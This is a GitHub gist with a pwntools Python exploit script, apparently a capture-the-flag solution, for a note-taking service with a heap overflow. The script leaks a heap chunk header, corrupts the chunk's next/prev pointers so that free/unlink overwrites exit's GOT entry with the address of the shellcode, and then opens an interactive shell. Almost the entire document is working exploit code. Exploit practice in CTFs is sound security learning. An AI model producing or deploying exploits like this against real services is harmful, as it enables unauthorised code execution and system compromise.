Last active
August 29, 2015 14:18
-
-
Save ocean1/32734e6aacb30bc267ed to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| context(arch='i386', os='linux', log_level="info") | |
| HOST = args.get('HOST', "localhost") | |
| PORT = 4000 | |
| got_exit = 0x804A010 | |
| # account in the shellcode that when we overwrite prev/next | |
| # it may overwrite part of the shellcode, we want to jump over | |
| sc = asm("jmp $+14") + "A" * 12 + asm(shellcraft.sh()) | |
| log.debug(disasm(sc)) | |
| f_hchunk = "<III" | |
| def create_note(size): | |
| r.sendline("1") | |
| r.sendline("%d" % size) | |
| r.recvuntil("option.\n") | |
| def modify_note(id, size, content): | |
| r.sendline("3") | |
| r.sendline("%d" % id) | |
| r.sendline("%d" % size) | |
| r.recvuntil("your data.") | |
| r.sendline("%s" % content) | |
| r.recvuntil("option.") | |
| def print_note(id): | |
| # leak out the pointer to the previous chunk | |
| r.sendline("4") | |
| r.recvuntil("id.\n") | |
| r.sendline("%d" % id) | |
| return r.recvuntil("option.") | |
| def remove_note(id): | |
| r.sendline("2") | |
| r.sendline("%d" % id) | |
| r.recvuntil("option.\n") | |
| with process(HOST) if HOST.startswith("./") \ | |
| else remote(HOST, PORT, timeout=0.5) as r: | |
| create_note(len(sc)) # add note 0 | |
| create_note(16) # add note 1 | |
| size = len(sc) | |
| alloc_size = size + 12 - (size + 12) % 12 + 12 | |
| pad_size = alloc_size - size - 12 | |
| # modify size 0 to overwrite note2 | |
| # overwrite also the size getting over the size allocated | |
| padding = "A" * pad_size | |
| modify_note(0, 100, flat(sc, padding, "AAA")) | |
| # only overwrite 3 bytes for size | |
| # since there is a \n to account for | |
| out = print_note(0) | |
| _hp = (len(sc) + pad_size) | |
| # we will receive the header struct after the shellcode at least | |
| (s, n, p) = struct.unpack_from(f_hchunk, out, _hp) | |
| log.info( | |
| "leak chunk for note 1: (%s, %s, %s)" % (hex(s), hex(n), hex(p)) | |
| ) | |
| sc_addr = p + 12 # add size of the header | |
| # now overwrite again and overwrite next and prev pointer | |
| modify_note(0, 100, flat( | |
| sc, padding, "AAAA", p32(got_exit), # overwrite next | |
| p32(sc_addr) # overwrite prev | |
| )) | |
| # free -> list unlink -> overwrite prev pointer which points to got with | |
| # pointer to the shellcode | |
| remove_note(1) | |
| # call exit() | |
| r.send("6\n") | |
| r.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment